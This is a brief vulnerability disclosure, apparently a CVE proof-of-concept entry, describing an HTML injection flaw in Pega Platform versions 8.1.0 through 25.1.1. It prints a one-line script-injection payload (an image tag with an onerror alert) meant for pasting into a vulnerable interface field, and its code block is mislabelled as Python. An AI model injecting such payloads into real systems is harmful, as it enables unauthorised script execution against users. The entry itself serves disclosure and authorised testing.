Pega Platform versions 8.1.0 through 25.1.1 are affected by an HTML Injection vulnerability in a user interface component. Requires a high privileged user with a developer role.
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept: HTML Injection Payload -->
<!-- Inject the following string into a vulnerable UI component field -->
<img src=x onerror=alert('CVE-2026-1564')>